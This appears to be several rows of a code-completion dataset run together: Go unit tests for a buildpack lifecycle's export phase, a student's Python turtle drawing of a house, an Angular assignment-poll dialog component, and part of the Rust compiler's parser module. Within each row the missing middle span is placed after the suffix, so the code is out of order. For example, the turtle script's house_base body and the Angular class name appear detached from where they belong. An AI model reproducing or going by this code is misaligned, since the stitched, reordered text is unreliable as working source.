fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepos := []string{"some-repo-name", "some-run-image"}
err := lifecycle.Export(context.Background(), expectedRepos[0], expectedRepos[1], true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_REGISTRY_AUTH={}")
})
it("configures the phase with root", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Export(context.Background(), "test", "test", true, "", expectedNetworkMode, fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
it("configures the phase to write stack toml", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBinds := []string{"some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
h.AssertEq(t, len(configProvider.ContainerOps()), 2)
h.AssertFunctionName(t, configProvider.ContainerOps()[0], "WriteStackToml")
h.AssertFunctionName(t, configProvider.ContainerOps()[1], "WriteProjectMetadata")
})
it("configures the phase with default process type", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.DefaultProcessType = "test-process"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedDefaultProc := []string{"-process-type", "test-process"}
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, expectedDefaultProc)
})
when("using cache image and publishing", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures phase with cache image", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
})
})
when("platform 0.3", func() {
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
when("publish is false", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with daemon access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with tcp docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", false, "tcp://localhost:1234", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://localhost:1234")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-daemon"},
[]string{"-launch-cache", "/launch-cache"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Export(context.Background(), "test", "test", false, "", expectedNetworkMode, fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBinds := []string{"some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
})
it("configures the phase to write stack toml", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBinds := []string{"some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
h.AssertEq(t, len(configProvider.ContainerOps()), 2)
h.AssertFunctionName(t, configProvider.ContainerOps()[0], "WriteStackToml")
h.AssertFunctionName(t, configProvider.ContainerOps()[1], "WriteProjectMetadata")
})
it("configures the phase with default process type", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.DefaultProcessType = "test-process"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedDefaultProc := []string{"-process-type", "test-process"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, expectedDefaultProc)
})
when("platform 0.3", func() {
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
when("override GID", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory = fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
when("override GID is provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
})
it("configures the phase with the expected arguments", func() {
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
})
it("gid is not added to the expected arguments", func() {
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
})
}
func newTestLifecycleExecErr(t *testing.T, logVerbose bool, ops ...func(*build.LifecycleOptions)) (*build.LifecycleExecution, error) {
docker, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.38"))
h.AssertNil(t, err)
var outBuf bytes.Buffer
logger := ilogging.NewLogWithWriters(&outBuf, &outBuf)
if logVerbose {
logger.Level = log.DebugLevel
}
defaultBuilder, err := fakes.NewFakeBuilder()
h.AssertNil(t, err)
opts := build.LifecycleOptions{
AppPath: "some-app-path",
Builder: defaultBuilder,
HTTPProxy: "some-http-proxy",
HTTPSProxy: "some-https-proxy",
NoProxy: "some-no-proxy",
}
for _, op := range ops {
op(&opts)
}
return build.NewLifecycleExecution(logger, docker, opts)
}
func newTestLifecycleExec(t *testing.T, logVerbose bool, ops ...func(*build.LifecycleOptions)) *build.LifecycleExecution {
t.Helper()
lifecycleExec, err := newTestLifecycleExecErr(t, logVerbose, ops...)
h.AssertNil(t, err)
return lifecycleExec
} | h.AssertNil(t, err)
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory |
A03_Wellst.py | #######################################################################################################################
# Taran Wells
# Wellst
# https://docs.google.com/document/d/1RBeOXjYBBjZ507wVeQVIPBrU7gBvTNJi8BYGDvtC53w/edit?usp=sharing
#######################################################################################################################
import turtle # allows us to use the turtles library
wn = turtle.Screen()
wn.colormode(255)
# setup turtles
base = turtle.Turtle()
base.hideturtle()
roof = turtle.Turtle()
roof.hideturtle()
glass = turtle.Turtle
wn.bgcolor("red")
def house_base(t, sz):
|
def house_roof(t1, sz):
"""Roof of house"""
t1.color(135, 30, 160) # roof purple
t1.begin_fill()
for side in range(3):
t1.forward(sz) # shape roof
t1.left(120)
t1.end_fill()
t1.penup()
def placement(t2, sz):
"""place glass in starting position"""
t2.fd(sz)
t2.right(90)
t2.fd(sz)
def house_window(t3):
"""window on house"""
t3.begin_fill()
t3.pendown()
t3.pencolor('black')
for side in range(4):
t3.fd(35)
t3.right(90)
t3.fillcolor(30, 135, 160) # make window light blue
t3.end_fill()
def main():
roof.penup()
roof.back(30)
roof.pendown()
house_base(base, 140)
placement(base, 70)
house_roof(roof, 200)
house_window(base)
base.left(90)
house_window(base)
base.left(90)
house_window(base)
base.left(90)
house_window(base)
base.pu()
base.left(90)
base.fd(70)
base.right(90)
base.pd()
base.begin_fill()
for grass in range(2):
base.fd(1000)
base.left(90)
base.fd(2000)
base.left(90)
base.fd(1000)
base.left(90)
base.fd(1000)
base.fillcolor(0, 255, 0)
base.end_fill()
main() # calls on main function
wn.exitonclick()
| """Base of house"""
t.color(250, 165, 10) # house orange
t.pendown()
t.begin_fill()
for side in range(2):
t.forward(sz)
t.right(90) # square house
t.forward(sz)
t.right(90)
t.end_fill()
t.penup() |
assignment-poll-dialog.component.ts | import { Component, Inject } from '@angular/core';
import { FormBuilder } from '@angular/forms';
import { MAT_DIALOG_DATA, MatDialogRef } from '@angular/material/dialog';
import { TranslateService } from '@ngx-translate/core';
import { PollDialogData } from 'app/core/ui-services/base-poll-dialog.service';
import { ComponentServiceCollector } from 'app/core/ui-services/component-service-collector';
import { BaseModel } from 'app/shared/models/base/base-model';
import { GeneralValueVerbose, VoteValue } from 'app/shared/models/poll/poll-constants';
import { PollPropertyVerbose } from 'app/shared/models/poll/poll-constants';
import {
AssignmentPollMethodVerbose,
AssignmentPollPercentBaseVerbose,
PollMethod
} from 'app/shared/models/poll/poll-constants';
import { ViewPoll } from 'app/shared/models/poll/view-poll';
import { ViewAssignment } from 'app/site/assignments/models/view-assignment';
import { BasePollDialogComponent } from 'app/site/polls/components/base-poll-dialog.component';
import { debounceTime, distinctUntilChanged } from 'rxjs/operators';
import { AssignmentPollService, UnknownUserLabel } from '../../services/assignment-poll.service';
/**
* A dialog for updating the values of an assignment-related poll.
*/
@Component({
selector: `os-assignment-poll-dialog`,
templateUrl: `./assignment-poll-dialog.component.html`,
styleUrls: [`./assignment-poll-dialog.component.scss`]
})
export class | extends BasePollDialogComponent {
public unknownUserLabel = UnknownUserLabel;
/**
* List of accepted special non-numerical values.
* See {@link PollService.specialPollVotes}
*/
public specialValues: [number, string][];
public generalValueVerbose = GeneralValueVerbose;
public PollPropertyVerbose = PollPropertyVerbose;
public AssignmentPollMethodVerbose = AssignmentPollMethodVerbose;
public AssignmentPollPercentBaseVerbose = AssignmentPollPercentBaseVerbose;
public readonly globalValues = [`global_yes`, `global_no`, `global_abstain`];
/**
* Constructor. Retrieves necessary metadata from the pollService,
* injects the poll itself
*/
public constructor(
componentServiceCollector: ComponentServiceCollector,
protected translate: TranslateService,
formBuilder: FormBuilder,
public dialogRef: MatDialogRef<BasePollDialogComponent>,
public assignmentPollService: AssignmentPollService,
@Inject(MAT_DIALOG_DATA) public pollData: PollDialogData | ViewPoll
) {
super(componentServiceCollector, translate, dialogRef, pollData, formBuilder);
}
public onBeforeInit(): void {
this.subscriptions.push(
this.pollForm.contentForm.valueChanges.pipe(debounceTime(150), distinctUntilChanged()).subscribe(() => {
this.triggerUpdate();
})
);
}
protected getContentObjectsForOptions(): BaseModel[] {
if (!this.pollData) {
return [];
}
const contentObject = this.pollData.content_object as ViewAssignment;
return contentObject.candidatesAsUsers;
}
protected getAnalogVoteFields(): VoteValue[] {
const pollmethod = this.pollForm.contentForm.get(`pollmethod`).value;
const analogPollValues: VoteValue[] = [];
if (pollmethod === PollMethod.N) {
analogPollValues.push(`N`);
} else {
analogPollValues.push(`Y`);
if (pollmethod !== PollMethod.Y) {
analogPollValues.push(`N`);
}
if (pollmethod === PollMethod.YNA) {
analogPollValues.push(`A`);
}
}
return analogPollValues;
}
}
| AssignmentPollDialogComponent |
mod.rs | pub mod attr;
mod diagnostics;
mod expr;
mod generics;
mod item;
mod nonterminal;
mod pat;
mod path;
mod stmt;
mod ty;
use crate::lexer::UnmatchedBrace;
pub use diagnostics::AttemptLocalParseRecovery;
use diagnostics::Error;
pub use path::PathStyle;
use rustc_ast::ptr::P;
use rustc_ast::token::{self, DelimToken, Token, TokenKind};
use rustc_ast::tokenstream::{self, DelimSpan, TokenStream, TokenTree, TreeAndSpacing};
use rustc_ast::DUMMY_NODE_ID;
use rustc_ast::{self as ast, AnonConst, AttrStyle, AttrVec, Const, CrateSugar, Extern, Unsafe};
use rustc_ast::{Async, Expr, ExprKind, MacArgs, MacDelimiter, Mutability, StrLit};
use rustc_ast::{Visibility, VisibilityKind};
use rustc_ast_pretty::pprust;
use rustc_errors::{struct_span_err, Applicability, DiagnosticBuilder, FatalError, PResult};
use rustc_session::parse::ParseSess;
use rustc_span::source_map::{Span, DUMMY_SP};
use rustc_span::symbol::{kw, sym, Ident, Symbol};
use tracing::debug;
use std::{cmp, mem, slice};
bitflags::bitflags! {
struct Restrictions: u8 {
const STMT_EXPR = 1 << 0;
const NO_STRUCT_LITERAL = 1 << 1;
}
}
#[derive(Clone, Copy, PartialEq, Debug)]
enum SemiColonMode {
Break,
Ignore,
Comma,
}
#[derive(Clone, Copy, PartialEq, Debug)]
enum BlockMode {
Break,
Ignore,
}
/// Like `maybe_whole_expr`, but for things other than expressions.
#[macro_export]
macro_rules! maybe_whole {
($p:expr, $constructor:ident, |$x:ident| $e:expr) => {
if let token::Interpolated(nt) = &$p.token.kind {
if let token::$constructor(x) = &**nt {
let $x = x.clone();
$p.bump();
return Ok($e);
}
}
};
}
/// If the next tokens are ill-formed `$ty::` recover them as `<$ty>::`.
#[macro_export]
macro_rules! maybe_recover_from_interpolated_ty_qpath {
($self: expr, $allow_qpath_recovery: expr) => {
if $allow_qpath_recovery && $self.look_ahead(1, |t| t == &token::ModSep) {
if let token::Interpolated(nt) = &$self.token.kind {
if let token::NtTy(ty) = &**nt {
let ty = ty.clone();
$self.bump();
return $self.maybe_recover_from_bad_qpath_stage_2($self.prev_token.span, ty);
}
}
}
};
}
#[derive(Clone)]
pub struct Parser<'a> {
pub sess: &'a ParseSess,
/// The current token.
pub token: Token,
/// The previous token.
pub prev_token: Token,
restrictions: Restrictions,
expected_tokens: Vec<TokenType>,
token_cursor: TokenCursor,
desugar_doc_comments: bool,
/// This field is used to keep track of how many left angle brackets we have seen. This is
/// required in order to detect extra leading left angle brackets (`<` characters) and error
/// appropriately.
///
/// See the comments in the `parse_path_segment` function for more details.
unmatched_angle_bracket_count: u32,
max_angle_bracket_count: u32,
/// A list of all unclosed delimiters found by the lexer. If an entry is used for error recovery
/// it gets removed from here. Every entry left at the end gets emitted as an independent
/// error.
pub(super) unclosed_delims: Vec<UnmatchedBrace>,
last_unexpected_token_span: Option<Span>,
/// Span pointing at the `:` for the last type ascription the parser has seen, and whether it
/// looked like it could have been a mistyped path or literal `Option:Some(42)`).
pub last_type_ascription: Option<(Span, bool /* likely path typo */)>,
/// If present, this `Parser` is not parsing Rust code but rather a macro call.
subparser_name: Option<&'static str>,
}
impl<'a> Drop for Parser<'a> {
fn drop(&mut self) {
emit_unclosed_delims(&mut self.unclosed_delims, &self.sess);
}
}
#[derive(Clone)]
struct TokenCursor {
frame: TokenCursorFrame,
stack: Vec<TokenCursorFrame>,
cur_token: Option<TreeAndSpacing>,
collecting: Option<Collecting>,
}
#[derive(Clone)]
struct TokenCursorFrame {
delim: token::DelimToken,
span: DelimSpan,
open_delim: bool,
tree_cursor: tokenstream::Cursor,
close_delim: bool,
}
/// Used to track additional state needed by `collect_tokens`
#[derive(Clone, Debug)]
struct Collecting {
/// Holds the current tokens captured during the most
/// recent call to `collect_tokens`
buf: Vec<TreeAndSpacing>,
/// The depth of the `TokenCursor` stack at the time
/// collection was started. When we encounter a `TokenTree::Delimited`,
/// we want to record the `TokenTree::Delimited` itself,
/// but *not* any of the inner tokens while we are inside
/// the new frame (this would cause us to record duplicate tokens).
///
/// This `depth` fields tracks stack depth we are recording tokens.
/// Only tokens encountered at this depth will be recorded. See
/// `TokenCursor::next` for more details.
depth: usize,
}
impl TokenCursorFrame {
fn new(span: DelimSpan, delim: DelimToken, tts: &TokenStream) -> Self {
TokenCursorFrame {
delim,
span,
open_delim: delim == token::NoDelim,
tree_cursor: tts.clone().into_trees(),
close_delim: delim == token::NoDelim,
}
}
}
impl TokenCursor {
fn next(&mut self) -> Token {
loop {
let tree = if !self.frame.open_delim {
self.frame.open_delim = true;
TokenTree::open_tt(self.frame.span, self.frame.delim).into()
} else if let Some(tree) = self.frame.tree_cursor.next_with_spacing() {
tree
} else if !self.frame.close_delim {
self.frame.close_delim = true;
TokenTree::close_tt(self.frame.span, self.frame.delim).into()
} else if let Some(frame) = self.stack.pop() {
self.frame = frame;
continue;
} else {
return Token::new(token::Eof, DUMMY_SP);
};
// Don't set an open delimiter as our current token - we want
// to leave it as the full `TokenTree::Delimited` from the previous
// iteration of this loop
if !matches!(tree.0, TokenTree::Token(Token { kind: TokenKind::OpenDelim(_), .. })) {
self.cur_token = Some(tree.clone());
}
if let Some(collecting) = &mut self.collecting {
if collecting.depth == self.stack.len() {
debug!(
"TokenCursor::next(): collected {:?} at depth {:?}",
tree,
self.stack.len()
);
collecting.buf.push(tree.clone())
}
}
match tree.0 {
TokenTree::Token(token) => return token,
TokenTree::Delimited(sp, delim, tts) => {
let frame = TokenCursorFrame::new(sp, delim, &tts);
self.stack.push(mem::replace(&mut self.frame, frame));
}
}
}
}
fn next_desugared(&mut self) -> Token {
let (data, attr_style, sp) = match self.next() {
Token { kind: token::DocComment(_, attr_style, data), span } => {
(data, attr_style, span)
}
tok => return tok,
};
// Searches for the occurrences of `"#*` and returns the minimum number of `#`s
// required to wrap the text.
let mut num_of_hashes = 0;
let mut count = 0;
for ch in data.as_str().chars() {
count = match ch {
'"' => 1,
'#' if count > 0 => count + 1,
_ => 0,
};
num_of_hashes = cmp::max(num_of_hashes, count);
}
let delim_span = DelimSpan::from_single(sp);
let body = TokenTree::Delimited(
delim_span,
token::Bracket,
[
TokenTree::token(token::Ident(sym::doc, false), sp),
TokenTree::token(token::Eq, sp),
TokenTree::token(TokenKind::lit(token::StrRaw(num_of_hashes), data, None), sp),
]
.iter()
.cloned()
.collect::<TokenStream>(),
);
self.stack.push(mem::replace(
&mut self.frame,
TokenCursorFrame::new(
delim_span,
token::NoDelim,
&if attr_style == AttrStyle::Inner {
